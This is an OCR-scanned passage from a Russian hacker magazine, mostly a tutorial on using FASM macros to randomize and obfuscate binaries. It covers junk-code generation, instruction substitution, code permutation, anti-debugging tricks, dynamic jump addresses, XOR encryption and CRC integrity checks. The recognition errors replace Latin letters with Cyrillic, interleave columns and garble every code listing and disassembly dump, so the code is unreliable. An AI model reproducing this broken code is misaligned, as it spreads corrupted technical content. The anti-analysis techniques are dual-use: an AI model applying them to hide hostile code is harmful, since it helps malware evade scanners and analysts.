очень огорчает наличие аналогичных проблем с безопасностью на на- 
ших отечественных государственных сайтах. Вот, например, на сайте 
Федеральной службы технического и экспортного контроля (которая со 
следующего года будет защищать наши персональные данные), при- 
сутствуют все те же «мелкие» проблемы. 

Да чего уж, если порно-ролики на дорожных биллбордах Садового 
кольца хакеры крутят :). Но, все-таки, хотя бы законодатели в области 
информационной безопасности должны относиться к своим ресурсам 
ответственно. Иначе на кого же мы будем равняться? пг 
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взлом 






МПАЦИЯ 



КОДА 



ВРЕМЯ 



КОМПИЛЯЦИИ 



Однажды, после написания 
программы, которую я хотел 
сделать платной, я задумался 
о вопросе ее защиты. Писать 
навесной протектор желания 
не было, да и времени тоже. 
Возможно ли сделать 
что-то средствами компилятора 
РА8М, ведь у него мощнейший 
макроязык? 

В зтой статье я решил описать, 
что вышло из моих 
зкспериментов. Здесь на простых 
примерах будут описаны методы 
полиморфизма, пермутации, 
метаморфинга и обфускации 
бинарного кода. 



Итак, мне кажется, я добился отличных результатов, ведь у меня с 
блеском ПОЛУЧИЛОСЬ реализовать: полиморфизм (генерация мусор- 
ного кода), метаморфинг (замена инструкций аналогами), пермутацию 
(случайное перемешивание блоков кода с сохранением функционала и 
логики работы), обфускацию (метод запутывания логики кода, противо- 
действие анализу), контроль целостности кода (для защиты от измене- 
ния, раісб'ей), шифрование кода и данных. Рандомизация кода служит 
для защиты от автоматических распаковщиков, анализаторов, патчей, 
обфускация — для запутывания исследователя; при достаточной обфу- 
скации анализ программы может затянуться на долгие месяцы... Хватит 
болтовни, приступим! 

0ХВА11ЕЕ РРН6 

Первоначально следует написать генератор псевдослучайных чисел — 
сердце любого движка рандомизации кода. Генератор я взял простой, 
наподобие АМ5І С, для моих целей его вполне хватало. 

гпЦзееЦ = 100500 
тасго гапсіотіге { 

гапЦзееЦ = гапйзеесі * 1103515245 + 12345 
гапЦзееЦ = (гапсізеесі / 65536) той 0x100000000 
гпЦпит = гапсізеесі апсі ОхРРРРРРРР 

} 

Работает он исправно, но, так как инициализирующее значение по- 
стоянно, каждый раз, при каждой компиляции будет выдана одна и 



та же последовательность чисел. После недолгих раздумий и чтения 
официального форума, я нашел значение, которым можно завести ге- 
нератор — это бппезіаппр, ПМІХ-время. Получить его можно вот таким 
образом: гапсізеесі = %с. Генерировать случайное число, к примеру, 
в диапазоне О - ОхОЕАО, теперь можно так: 

гапсіотіге 

гапсіот_питЬег = гпсіпит тосі ОхВЕАВ - 1 

ОХВАОСООЕ ИЛИ ГЕНЕРАЦИЯ МУСОРА 

Для начала, попробуем написать макрос для генерации простой 
инструкции — іпГ Состоит ІПІ; из двух байт — опкода ОхСО и номера 
прерывания, который и будет случаен. Получаем номер прерывания: 

гапсіотізе 

іпС_ѵа1 = гпсіпит тосі ОхРР 

Далее пишем следующую незаурядную конструкцию: 

сіЬ ОхСВ 
сіЬ пит 

Пока все просто. Оформив эти 4 строки в отдельный макрос деп_іп1; и 
вызвав несколько раз, убеждаемся с помощью отладчика или дизас- 
семблера, что код действительно случайный: герц 7 { деп_іпС }. 
И вот что получилось: 



► 056 
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040605^ ]> рИ 

Ѳ>і8Ѳ^ѲѲ&5^. 

Ѳк80^0№56 
Ѳн8е^Ѳ0059 
Ві^вАтШБа 
Ѳк8Ѳ^09В5Ь 
0к8в-10В&5сІ 
0к00^000ЁЭ 
9мѲѲ^0ЭВ6^. 
. =< ВкЯ8^0ВВЁ7 
'- Ѳк00'1000Ёд 

9н8Ѳ^9906Ь 
Вкде^вввЁсі 
9к8Ѳ^090Ё1^ 
Ѳн8Ѳ^ѲЭВ70. 
Вкгб'1ВВВ72 
9к88^09В?7 
Ѳіі8в-10ВѲ7д 
.==< Ѳкеб^0В07Ь 
■“- 9«ѲѲ^ѲЭВ81 
Вк88^0В08Б 



9к8Ѳ^09Ваё 
=< ѲяѲѲ^Ѳ089Э 
Вкгѳ^ввввд 
9?<88^09В97 
0^88-100099 

=< ѳ^йа^ѳводь 



ээп 

пт^іттв^2 

9с 

сісп^ 

7200 

Пба 

І7ба 

Г7ба 

59 

СІ8СІ5 

Ъе 1591с с2аа 

8ЬсЬ 

00сЭ 

0Г990В 000000 

25Ѳ991В809 

ЗЭеЬ 

87 сЬ 

Г7СІ1 

^7ба 

Ь^42бёІеа7 

796? 

Эасі 

Эйсе 

Г?сІв 

7600 



стр ЬЬ, сІМ 
ГСГ есік, 0мСС 
рц5Ь еЬн ; (8к( 

рпр 

НСГ 95.1. 9(^1 
Іеа евк. [“0х1( 
пичИ^^і ^ 

'"'ГО уиі. 0м 1 В 
0м<В00Б9 ; 

ПЕд ейк 

пед ейн 

ПЕд рсік 

рпр 94к ; С0к8( 



ррр еак ; С ВнѲѲ0&0ЙѲЭЗ 

тсѵ езі. 0каае29с15 ; (0иТ1’1^^^^1йас29с15 
тоѵ 9СХ. 9Ьк 
ІШ &^Ѳ. 5« 

СІысггі 0М90ѲѲѲ1 ; 2 = ѲмВ090Ѳ0Й1 

йГКІ 9АК. 0МІ88 

кс^ід вЬк, век 
ПОІ: еск 

ПЕд 0ІІК 

трѵ ёСІІ. Ѳмй7^9гій42 ; (8и^’1Т^^^іГ1а7‘Рейі342 : 
е и4В8@іГ7 : 3 ^ 0кѲ048ѲѲ^7 

шр с[ . сіЬ 
ПЕд ейн 

2ІЗР 0И40Ѳ009 ; 4 = 0x00400098 




Затаившийся в бинарном мусоре 
антиотладочный трюк 



Г17ІІ1Н 

тасго іЕгеегед { 

ККЕС = ШКЕС 

ѵ^МІе (ЕЕЕС = ЕЕЗР) | (ЕЕЕС = ЕЕВР) | (ККЕС 
I (ККЕС = иЗЕВКЕСІ) I (ККЕС = ЕЗЕВКЕС2) 
гапсіотіге 

ККЕС = гпсіпит той 8 
епй \л?М1е 

} 

Регистры Езр и ЕЬр не трогаем, дабы не сорвать стековый фрейм. Это 
первое, что я хотел осветить. Чтобы код был похож на произведенный 
нормальным компилятором (дабы не показывать сразу исследователю, 
что его водят за нос), следует немного ограничивать фантазию. Приве- 
ду пример на инструкции Іеа, которая, как известно, используется для 
получения\вычисления адреса. Принимающий регистр будет случай- 
ным, а как быть со вторым операндом? Возьмем значение в диапазоне 
Епігу Роіпі: - (Епігу Роіпі: + размер секции кода), ну или, для простоты, 
возьмем значение 0x1000. Для большего соответствия с нормальным 
кодом следует брать адреса из секции данных. Макрос, генерирующий 



СЙ7 8 1 


ІПР 


0x7 8 


инструкцию [еа по правилам, описанным ранее: 


сйаб 1 


ІПР 


Охаб 




сйЬ4 1 


іпР 


0хЬ4 


тасго деп_1еа { 


сйЗб 1 


іпР 


0x3 б 


Тгеегед 


сйес 1 


іпР 


Охес 


гед = (ЕЕЕС * 8) + 5 


сйба 1 


ІПР 


Охба 


гапйотіге 


СЙ68 1 


ІПР 


0x68 


аййгезз = (гпйпит той ( (ЕЫТЕУ_РОІШ 



Метод гері: Іазт'а выполняет код указанное количество раз. По-моему, 
начало более чем хорошее, нас ждет много интересного. Давай теперь 
рассмотрим генерацию инструкции Іеа; здесь я хочу осветить несколько 
аспектов. Сперва нужно завести константы, соответствующие регистрам: 



- ЕЫТКУ_РОІЫТ) ) 
ЙЬ 0х8В 
ЙЬ гед 
йй аййгезз 



ЕЕТКУ_РОІЕТ 



ЕЕАХ 


С] 

< 

о 

II 


Константу ЕМТВУ_Р01МТ объявляем заранее: 


ЕЕСХ 


= 1 ; СЕ 




ЕЕВХ 


О 

(и 

II 


епЕгу зЕагЕ 


ЕЕВХ 


= 3 ; ВЕ 




ЕЕЗР 


= 4 ; АН 


зЕагЕ : 


ЕЕВР 


= 5 ; СН 


ЕШЕУ_РОІЫТ = $ 


ЕЕЗІ 


= б ; ВН 




ЕЕВІ 


= 7 ; ВН 


Или, ЧТО предпочтительнее: ешеу_роіш = 
са, вызванного несколько раз: 


Чтобы не нарушить работу кода, следует учитывать занятые регистры. 




Заведем переменные, хранящие их: 


8йЗйЫ0а4000 I Іеа ейі , [0х400аЫ] 
8й154с044000 I Іеа ейх, [0х40044с] 


ШЕЕС 


= -1 


8Й1Й68054000 1 Іеа еЬх, [0x400568] 


иЗЕВЕЕСІ 


= ШЕЕС 


8й05е7024000 I Іеа еах, [0х4002е7] 


ЬЗЕВЕЕС2 


= ШЕЕС 


8й15йЬ0е4000 I Іеа ейх, [0х400ейЬ] 


ЕЕЕС 


= ШЕЕС 


8Й15670Е4000 I Іеа ейх, [0х400Еб7] 


Их может быть сколько угодно — зависит от логики работы программы. 


Как видишь, код случаен, и не бросается 


логики работы генератора и строения блока кода. Ниже представлен 


стью. Теперь не мешало бы объединить н; 



макрос, генерирующий случайный регистр, не учитывая занятые. Ис- 
пользовать будем только как источник. 

тасго гпйгед { 

ККЕС = ШЕЕС 

ѵ^МІе (ЕЕЕС = ШЕЕС) | (ЕЕЕС = ЕЕЗР) | (ЕЕЕС = ЕЕВР) 
гапйотіге 

ЕЕЕС = гпйпит той 8 
епй ѵ^МІе 

} 

В принципе, можно включить в варианты и Евр ЕЬр регистры, но мне за- 
хотелось так. Теперь макрос, генерирующий случайный незанятый регистр: 



в один и построить код так, чтобы его было легко изменять 
или добавлять в него новые методы генерации инструкций, но 
для начала напишем еще один макрос для генерации ЕРСІ- 
инструкций: 

тасго деп_Три { 
гапйотізе 

Суре = гпйпит той 0x2 Е 
ЙЬ 0хВ8 

ЙЬ ОхСО + Суре 

} 

Проверим: 



ХАКЕР 08 /139/ 10 



► 057 





ВмВа 40005*1, / епігур 01111 :; 

0К00400054, ] Ц 

0К004Ѳ0Ѳ59 ] Ь9 

. 0к0Ѳ4ѲѲѲ5е 1 8Ё 

I Оі^8040Ѳе&1 1 4Ѳ 

I 0»0040е0&2 1 гз 

‘=< 0М0Ѳ 400064, 1 75 

0И00 400066 ] 

0М0040006В, 1 

Ѳм0Ѳ4ѲѲѲ6а 1 

0>^0040006с. I 

0М0040006? і 

0><00400070, ;1 

0М00 400072 1 

0X00400074, ] 

0x80400076 1 

0x80400070, 1 

0x80 4000 7а 1 

0х8Ѳ40ѲѲ7с, I 

Г 0к00400064]> 



тоѵ еах, [ 0x4000 Ь0] 

тоѵ есх, Ѳх2Ьс ; [0х0Ѳ0Ѳ02Ьс) 

хог Ьуіе (еах], 0х1Э 

Іпс еах 

-сшр еах 

^пг 0к40Ѳ05е ; 1 = 8ч0Ѳ40Ѳ05е 

Іпѵаі (й 
Іпѵаі \й 
Іпѵаі ІСІ' 

Іпѵаі \ іі 
Іпѵаі іій 
Іпѵаі Ій 
Іпѵаі Ій 
іпѵаі Ій 
Іпѵаі Ій 
Іпѵаі Ій 
Іпѵаі Ій 
Іпѵаі Ій 



Код перед морфингом 



Й8Й1 1 


Дсот 


зДО , 


зДІ 


Й8с9 1 


Дтиі 


зДО , 


зДІ 


Й8Й4 1 


Дсот 


зДО , 


зД4 


й8ей 1 


ДзиЬг зДО, 


зД5 


Й8Й6 1 


Дсот 


зД 0 , 


зДб 


Й8с2 1 


Дайй 


зД 0 , 


зД2 



Отлично! Теперь группируем, создаем макрос деп_1:га5Ь, принимающий 
параметром количество генерируемых инструкций. Улучшить этот макрос 
можно, сделав параметром не количество инструкций, а максимальный 
размер в байтах. Еще лучшим ходом будет параметр, являющийся пре- 
делом случайному количеству инструкций/размеру в байтах. Реализуем 
первый, упрощенный, но немного уступающий другим вариант: 



тасго деп_1:газ]т ІепдСІі { 
гереаД ІепдЩт 
гапсіотіге 

ѵагіапД = гапсізеесі той ѴАКІАЫТЗ 
ІД ѵагіапД = О 
деп_1еа 

еізе ІД ѵагіапД = 1 
деп_Дри 
епй і Д 
епй гереаД 

} 



Теперь для генерации 10 случайных инструкций указываем в коде: 
деп_дгаз]т 10. Следует расширить этот макрос, что не составит 
труда. Добавляй как можно больше инструкций\вариантов: ветвле- 
ния; статистику повторения инструкций; порядок следования (куча 
РРС-инструкций вперемешку с обычным кодом — это подозрительно, 
ты не находишь? Или десяток инструкций Іеа, идущих подряд? А бес- 
контрольный генератор вполне может творить такое). Идей в процессе 
должно возникать великое множество — пробуй все, что придет в 
голову, не ограничивай себя. Теперь пара слов об использовании 
макроса деп_1га5Ь. Сделаем простой расшифровщик, разбавленный 
мусором: 



деп_Дгаз]т 15 
тоѵ еах, .СойеЗДагД 
иЗЕБКЕСІ = ЕЕАХ 
деп_Дгаз]т 27 
тоѵ есх, СойеЗіге 
иЗЕВЕЕС2 = ЕЕСХ 
деп_Дгаз]т 2 0 
. адаіп: 

хог ЬуДе[еах], ХОЕ_КЕУ 

деп_Дгаз]т 37 

іпс еах 

деп_Дгаз]т 10 

Іоор .адаіп 

деп_Дгаз]т 43 




Х0Р_КЕУ, между прочим, тоже следует сделать случайным. 

гапсЗотіге 

ХОЕ_КЕУ = гпйпит той ОхЕЕ 

При большом количестве мусора и при достойном его качестве не так 
просто будет разобраться, что же в коде происходит, и как отделить его 
от мусора. Улучшить генератор можно, добавив работу с локальными\ 
глобальными переменными, различные переходы, ветвления, про- 
цедуры, различные варианты инструкций, сложные инструкции вида 
[еа еах,[ есх*4+100 ]... Но — главное!.. Самое главное — не забывай, 
что код должен быть схожим с генерируемым нормальным компилято- 
ром и одновременно хитрым, запутанным. Изучи частоту повторений 
инструкций в распространенных или входящих в состав операционной 
системы программ, а затем примени эту статистику в своем генераторе. 

0ХАСЕО1А АНТИОТЛАДКА 

Ни одна защита кода просто не представляется без антиотладочных 
трюков. Добавим и мы, но будем хитрее. Сделаем вставку случайного 
анти отладочно го трюка в случайном месте, то есть просто добавим к 
макросу деп_1:га5Ь, и трюк будет генерироваться наравне с инструк- 
циями. Простой пример — если отладчик обнаружен, выполняется 
переход на случайный адрес в пределах секции кода. 

тасго айЬд { 
гапйотізе 

ѵагіапС = гпйпит той N 
гапйотізе 

йезДіпаСіоп = (гпйпит той ( (ЕЕТЕУ_РОІЫТ + 0x1000) 

- ЕЕТЕУ_РОІЫТ) ) + ЕЫТКУ_РОІЫТ 

іі ѵаЦіапЦ = 0 

іпѵоке ІзВеЬиддегРгезепД 
ДезД еах, еах 
ЗП 2 $+йезДіпаДіоп 
еізе ІД ѵагіапД = N 



} 

Также трюки следует разбавлять мусором. Добавляй больше антиот- 
ладки — больше сюрпризов исследователю. 

ОХАСЕ ИЛИ РАНДОМИЗАЦИЯ АРІ-ВЫЗОВОВ 

Помимо бинарного мусора, код следует сделать высокоуровневым. 
Вполне послужит для этого ѴѴіпбоѵѵз АРІ. Функции могут не нести 
смысла, а могут быть и неотъемлемой частью программы. Простой 
пример вставки случайного АРІ-вызова: 

тасго деп_ДгазДі_арі { 
гапйотізе 

КапйотРагатІ = гпйпит той ОхРРРРЕРРР 
гапйотіге 

КапйотРагат2 = гпйпит той ОхРРРРЕРРР 
гапйотіге 

ѵагіапД = гпйпит той 4 
ІД ѵагіапД = 0 

іпѵоке ІзВайКеайРДг , КапйотРагатІ , КапйотРагат2 
еізе ІД ѵагіапД = 1 

іпѵоке I зВайШгі Д еРД г , КапйотРагатІ , КапйотРагат2 
еізе ІД ѵагіапД = 2 

іпѵоке I зВайСойеРД г , КапйотРагатІ 
еізе ІД ѵагіапД = 3 
іпѵоке СеДРазДЕггог 
епй і Д 

} 

Не стоит забывать, что АРІ-функции не сохраняют регистры Еах, Есх 



► 058 
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МОРФИМ 
НЕ ОТХО. 
ОТ КАС( 



гйыйй^йййцаі^ пн ' 
















/ 


епігуроіпі: 






0^0035^, 


1 


7В5е^0 И000 


ригЬ 4ІІІОГСІ [8х4001@4) 




Зк0В^0В35а 


1 


58 


рор еах : (ѲхѲЗВѲВѲЗб) ^ 




Зк0В^0В35Із 


1 


2СІС6000В03 


еах, ЗхсЗ 1 




3x00^00360, 


1 


Зіс9 


ког есх. есх I 




3x00^80362 


1 


еісіьсѳгѳеѳ0 


есх. Зх2Ьс I 




3x00^00360. 


1 


51 


риэИ есх і С 8x300 00801) 




3x00^80360 


1 


53 


риеіі 




ЗхВВ^ЗѲЗБа 


1 


СІ1&0 


бГіі еах, 1 




Зх0Ѳ^8Ѳ36с, 


1 


вдсв 


ог еах, есх 




3x00^30360 


1 


58 


рор еах : (0x03000088? 




3x00^8036^ 


1 


59 


рор есх : <0x03000089? 




3x08^80370. 


1 


ЗІ8Ь 


хог еЬх. еЬх 


І 


3x00^80372 


1 


6ЭГ313 


хрг еЬх. 3x13 


І 


3x09^80376 


1 


3016 


хог [еах), Ы 


1 


3x00^80377 


1 


53 


рисГі еах 


1 


3x09^80370, 


1 


358?с0а[^сІе 


ног еах . Зхеіеайсісіе 




3х00^8037с1 


1 


еѳз-іг^ѳі 


агіб Ьуіе [е5р)н 0x1 


1 


3x08^00381 


1 


58 


рор еах : <0x03008088? 


[ 


3x00^80382 


1 


51 


ри^Ь есх і С8хЗѲѲ008Ѳ1) 


Е 


8x00^80363 


1 


58 


ри^Ь еах 


I 


8x08^8036^, 


1 


гэсі 


есх, еах 


■=< 


8x08^80366 


1 


75е6 


пг 0x480370 ; 1 = 0Х0Ѳ40ЭѲ70 




Обфусцированный тоѵ 



Код после морфинга 



ризіі агд2 
тоѵ агді , [езр] 
асісі езр, 4 

еізе і:Е ѵагіапР = 2 
ризіі агд2 
хсіід агді , агд2 
рор агд2 

еізе ѵагіапР = 3 



и Есіх. Сохраняй значения этих регистров, если в них содержатся 
и используются важные значения. Вставим вызов этого макроса в 
деп_1:га5Ь. Подключи фантазию; вызовы функций не обязательно 
должны быть одиночными, высокоуровневый мусор должен взаимо- 
действовать с бинарным — не подкопаешься. Неплохо будет эмулиро- 
вать некоторые функции, то есть реализовать их код у себя. Вызов или 
использование своего кода являются вариантами, пример: 

тасго СеРЬазРЕггог { 
гпсі 

ѵагіапС = гпсіпит тосЗ 2 
ѵагіапС = О 
тоѵ еах, [1з : 181і] 
тоѵ еах , [еах+ТЕВ . ЬазРЕггог ] 
еізе 11 ѵагіапі = 1 
іпѵоке СеРЕазРЕггог 
епсі ІР 

} 

0ХА11А5, ИЛИ МЕТАМОРФИНГ 

Метаморфинг я реализовал как замену инструкций своими функцио- 
нальными аналогами. РА5М позволяет переопределять инструкции 
макросами, что очень удобно. Возьмем, к примеру, инструкцию тоѵ 
гед32_1 , гед32_2. Какие могут быть аналоги? Первое, что приходит в 
голову (вообще их можно придумать великое множество): 

ризіі гед32_2 

рор гед32_1 

ризіі гед32_2 

тоѵ гед32_1, [езр] 

асЗсі езр, 4 

ризіі гед32_2 

хсіід гедЗ 2_1 , гедЗ 2_2 

рор гед32_1 

Примени фантазию, не следуй шаблонам, и за небольшой промежуток 
времени можно будет написать достаточное количество аналогов для 
всех инструкций. Напишем макрос, переопределяющий инструкцию 
тоѵ. Обязательно проверяем, что аргументы являются регистрами, так 
как у нас есть замена только этого варианта: 

тасго тоѵ агді , агд2 { 

11 (агді едіуре еах) & (агд2 едіуре еах) 
гпсі 

ѵагіапі = гпсіпит тосі 4 



тоѵ агді , агд2 
епсЗ 11 

еізе 

тоѵ агді , агд2 
епсі 11 

} 

Проверяем: 



тоѵ еах,есх 
тоѵ есх,есх 
тоѵ есіх, езр 



Итог: 




51 


1 ризіі есх 


91 


1 хсіід есх, еах 


59 


1 рор есх 


89е5 


1 тоѵ еЬр, езр 


53 


1 ризіі еЬх 


59 


1 рор есх 



Замечательно, не правда ли? Добавив как можно больше инструкций 
и вариантов замены, можно добиться замечательных результатов. 

0ХАВ1Е, ИЛИ ПЕРМУТАЦИЯ 

Здесь все тоже предельно просто и дает мощный результат. Нам нужно 
изменить расположение некоторых блоков кода без изменения функ- 
циональности и без повреждения кода. Для начала за блоки возьмем 
процедуры, далее эти блоки следует максимально уменьшить. Над 
способом случайного изменения блоков кода я недолго думал, возмож- 
но, есть более изящное решение — подумай. Суть такова: каждую про- 
цедуру оборачиваем в макрос, создаем для нее переменную — флаг, 
сигнализирующий об использовании, дабы не вставлять процедуры 
несколько раз. Например (пермутируем три процедуры, скелет), код 
главной структуры теперича выглядит так: 

1ргос_1 = О 
1ргос_2 = О 

епігу $ 

;код главной процедуры 



ѵ\[1і11е (11ад_1 = 0) I (11ад_2 = 0) 
гапсіотіге 



11 ѵагіапі = о 
ризіі агд2 
рор агді 

еізе 11 ѵагіапі = 1 



зедиепсе = гпсіпит тосі 2 
11 зедиепсе = 0 
11 11ад_1 = о 
ргос_1 
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► 059 








0К0ѲНѲ8Ѳ56 

гкѳе^боѳ5в. 
0кѲб^ввВ5а 
Ѳи004ѲвѲ5с. 
Ѳк00^0ввБ2 
0к00^0ввББ 
0»0в^0$а&в. 
ѲкѲѲ^Ѳ9Ѳ6е 
.=< Ѳк00ЧѲ^7Ѳ. 
.=< 0к00^08Ѳ7В, 
■ • 0Х00408Ѳ75 
0«ѲѲ^е®Ѳ77 
0к0Ѳ^Ѳ8Ѳ7с. 
0кѲ0^08ВВ1 
Ѳл00^00ВВ7 
Ѳк00^08ВВ7 



I .^^=< 0э<00^е00Ве 
I I I 0К0ѲЧѲ8Э9Ѳ. 
I , ====< Ѳ«0Ѳ40вВ95 
ММ 0к00^0ѲВЭ7 
ММ Ѳх00^0вВВВ, 
ММ ' ^0вВ99 



Епігуроіпі: 

56 

і^7сІЬ 

33с2 

ЗЗса 

Вгі15547с9е7Ь 

ѲЗГѲ64 

сІсбѲ^ 

Вгі35ЬІЙ92ЕЭЗ 

33с7 

Гип.0048ВВ70: 

Ш0Ѳ000000 

ВЬсІІ 

а1а500Ч000 
Ѳ599Ѳ&1ѲѲѲ 
2ЬѲ5а9ѲѲ^00Ѳ 
/ ^ип.004ВВВ67.еір,гір; 

I ІіС^Ѳ 

I 736с 

I 64ЙЙЙЕ 

I 7364 

I бЬбсбэбебб 

I 7673 

I 6Ь6«Зіс0 

ЕІр -> гйн; бе 



ризН Е5І ^ еМ . ЗЕСІІ оп_ЬЕа[ІЕГз*Ѳк6 
рор 

пед еЬх 

хог еаи. е-^ів 

хог ейм 

І9а ейи. [Вк7Ь997с543 

сітір Еак^ вхБ4 

ГПІ Е5І^ Ѳк8^ 

ІЕо ЕэМ (вкЗЗЗв69Ь'ГЗ 
ког еан. 

^тр 0x400875 : 1 = 0Х0В4ВВВ75 

шоѵ ейх^ &СХ 

тоѵ еак. [8х4000в53 

асісі еах. 8к4ѲѲѲ99 

5иЬ еах, [Вв4000а91 

саі 1 еак ^ 2 = Ѳм00Ѳ0Ѳ11с 
^аЕ Ѳк4Ѳ99^7 г Э = 0x004000^7 
□ІЙ аиізЬ 

^ае 0х40ёвН ; А = 0x004000^4 
ітиЗ еЬр. ІеВк*еЬр*2*Ѳх6е] . Ѳк66 
^Ье 0x488109 : 5 = 0х0В4ВѲ1Ѳа 

ітиі еЬр. [еаМѲхЭІЬ вясѲ 
оиізЬ 



После патча контрольная сумма отличалась всего 
лишь на один байт, и теперь переход выполнен не 
туда, куда надо 



І1ад_1 = 1 

епсі іі 

еізе іі зедиепсе = 1 
:Е1ад_2 = О 
ргос_2 
^1ад_2 = 1 
епсі іі 
епсі і:Е 
епсі ѵ^МІе 
тасго ргос_1 { 

ргос АпуРгосесіигеІ 

геР 

епсір 

} 

тасго ргос_2 { 

ргос АпуРгосесіиге2 

геР 

епсір 

} 

Проверив этот код, убеждаемся, что процедуры выставляются как 
надо, случайно, код не портится. 




ризіі (іезРіпаРіоп - ѵаіие 
асісі [езр] , ѵаіие 



зтр [езр] 

еізе 11 ѵагіапі = 1 
гапсіотізе 

ѵаіие = гпсіпит тосі ( ОхРРРРРРРР - ІМАСЕ_ВАЗЕ 
- 0x1000) 

ризіі сіезііпаііоп + ѵаіие 
зиЬ [езр] , ѵаіие 
зтр [езр] 
епсі 11 

} 

тасго о_1аЬе1 пате { 

ІаЬеІ пате 
асісі езр, 4 

} 

Итог работы макросов: 



68001127Ь6 

812с249Ы0е7Ь5 

112424 

ЗІсО 

83с404 

ЗІсО 



ризіі сіѵ^огсі 0хЬб27110 0 

зиЬ дмотд^ [езр] , 0хЬ5е7109Ь 

зтр (іѵ70Г(і пеаг [езр] 

хог еах, еах 

асісі езр, 0x4 

хог еах, еах 



Без трассировки и не узнаешь, куда ведет переход, следовательно, 
статический анализ обламывается. Здесь также стоит учитывать за- 
нятые\свободные регистры в генераторе мусора, так как постоянное 
использование Езр ставит клеймо на способе, да и само по себе на- 
кладно. Еще одной неплохой уловкой является вставка переходов на 
данные, но переходы эти никогда не выполняются (или выполняются 
только при наличии отладчика). Это сбивает с толку анализаторы, и 
они пытаются дизассемблировать данные. Пример макроса: 

тасго 1аске_со(іе_ге1 сіа1а_а(і(іг , зтр_асі(іг { 
хог еах, еах 
іпс еах 
ЗП 2 зтр_асі(іг 
саіі (іа1а_а(і(іг 
; Ігазіі 

} 



ОХОЕРАСЕО, ИЛИ ОБФУСКАЦИЯ: ДИНАМИЧЕСКОЕ 
ВЫЧИСЛЕНИЕ АДРЕСОВ 

Один из способов противодействия дизассемблерам и обману анали- 
заторов — динамическое вычисление адресов переходов или адресов 
переменных. Пример, как можно вычислять адрес: 

ризіі ІаЬеІ - ѵаіие 
асісі [езр] , ѵаіие 
зтр [езр] 

ІаЬеІ: 

асісі езр, 4; избавляемся от ненужного 

Следует сделать случайными алгоритмы вычисления, варианты реа- 
лизации алгоритма, и, естественно, значения для модис|іикации. При- 
мерами этого станут представленные ниже макросы о_]ппр и оІаЬеІ: 

таого о_^тр сіезііпаііоп { 
гапсіотіге 

ѵагіапі = гпбпит тоб 2 
11 ѵагіапі = о 
гапботіге 

ѵаіие = гпбпит тоб ІМАСЕ_ВАЗЕ 



В итоге адрес ба1:а_аббг будет анализироваться как код. 

0ХА55 - ЗАШИФРОВКА КОДАХДАННЫХ 

Замечательными с()ункциями макроязыка РА5М, отличающими его 
от других макроассемблеров, являются Іоаб и зЬге. Использовать их 
можно для ши(|ірования кода или данных. Простой пример, для шис^- 
рования используется хог: 

тасго хог_ба1а зіагі , ІепдіЬ , кеу { 
гереаі ІепдіЬ 

Іоаб X Ігот з1аг1+%-1 
X = X хог кеу 
зіоге X а1 з1аг1+%-1 
епб гереаі 

} 

Очень полезный макрос, я его использовал для зашис|іровки строко- 
вых данных. Пример использования: 

гапботіге 

ХОЕ_КЕУ = гпбпит тоб ОхЕЕ 

хог_ба1а зігіпдз, з1гіпдз_зІ2е , ХОЕ_КЕУ 

зігіпдз : 



► обо 
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0х0ВЦ0005^]> рй 

0x0040005^. 
ѲиѲѲШѲ5^, 
0x0 040005а 
0x0 340005с. 
0х0040005е 
0x00400064. 
0X00400066 



0x0040006с 




/ епігурпіпі: 



ВІІ05122Ѳ0Ѳ37 

ёВіЛ 

(ІВ05 ' 

е0Ш9Ѳ9аЬ^4 

с1Ве8 

ЗШёёЗВЗВдз 



8сЛгі71с14сЭа0 



Іеа еах, Е0к370В2Ѳ121 

■рСОПІ 5 І 0 . 5 І 7 

■ГбоЬ бііЭ. бі5 

Іеэ еЬх, Е-ѲкЬ54^6с7І I 

'ГзиЬг ЗІ0. ЗІ0 

Іеа есн. I -0х75с77723] I 



Іеа 0Ьх, Е-0х513с2Ь81^] 



Взгляд на многообещающее будущее через окно 
гасіаге 



апу_з1:гіпд сіЬ 'Ма1іе . Реесі. Кііі . Кереаі: ' 
зРгіпдз_зІ 2 е = $ - зРгіпдз 



0ХАВА51А, ИЛИ КОНТРОЛЬ ЦЕЛОСТНОСТИ КОДА 



Вычислив на стадии компиляции контрольные суммы участков кода, 
можно защититься от модификации, пересчитывая и проверяя при вы- 
полнении эти суммы. Также подобным образом можно детектировать 
трассировку посредством вставки в код прерывания іпТЗ, как делают 
многие отладчики. Макрос, вычисляющий сгс32 сумму блока кода: 



' вхѲѲ^ѲЭѲ57 

вхѲѲ^ѲѲѲ5с. 
0ХѲ040ѲЭ5Г 
0x00400062 
0Х0Ѳ40ѲѲ64. 
і =< 0x00400067 
. =< 0x00400067 
I ѲхѲѲ400Ѳ6с, 

0х0Ѳ4ѲѲ06е 
.==< 0x00400070, 
.=»< 0x00400070. 
■ - 0x00400075 

0x00400078. 
Ѳх0Ѳ400О7в 
0Х0Ѳ40ѲѲ7С. 
. беі ' ,121 
0х0Ѳ400Ѳ7е 
0x00400080. 
0x00400082 
0x00400084. 
.===< ОхѲ04ѲѲ08а 
.-==< Ох0040008а 
■ — 0Х004Ѳ8О8Т 

8x80400091 
0x00400093 
8x00400895 
====< 8x00400097 
8x0040089с. 
0х00400Ѳ9е 
ОхОѲ400Ѳ9Г 
8х00400ѲаѲ. 
Ох004О0Ѳа6 
8х0Ѳ40Ѳ0а8. 
0х004000аа 



■сѲбѲ 
ЬЬ26а37Ь8с 
с146в5 
сІсѲаТ 
(18е2 
с 14895 

Тип. 00000067; 

■Ѳ0Ѳ0ѲОѲѲ 

ЗасѲ 

Т748 

Тил.ѲѲ0ѲеѲ70; 

■Ѳ000ѲѲѲ0 

сІсИЬ 

48с(1 

ЗаТе 

87св 




МОРФИМ 
НЕ ОТХО. 
ОТ КАС( 



^Iпр 0х4000бс 
сшр аі. а1 
пед еах 



^П 1 р 0x400075 
ГОІ есх. 0х^Ь 
Ттиі 5І0. 5 і5 
сяір ЬЬ. (1Ь 
хсЬд есіх. есх 



2 * 0x00400075 



ЗЬсЬ 

0743 

8740 

Ѳ404а0814е76 



слір есх. еЬх : (0x00000079) 

хсЬд еЬх. е4х 

хсЬд еах. е4х 

Іеа есх. [0х764е81в01 



■0Ѳ0ѲѲ00Ѳ 

ЗЗсе 

8748 

48е9 

Т741 

6900000000 

87с6 

56 

5о 

84054ТСІ9182 

Т74Ь 

ЗЗГЗ 

840544884432 



^<пр 8х4Ѳ0Ѳ8Т ; 3 = 0Х00400Ѳ8Т 

хог есх, Ѳ5І 

хсЬд еах. еЬх 

ТзиЬг 5І0. 5І1 

ПОІ есх 

^ЯIр 0х400етс^ : 4 г ВхѲ040Ѳ09с 

хсЬд езі , еах 

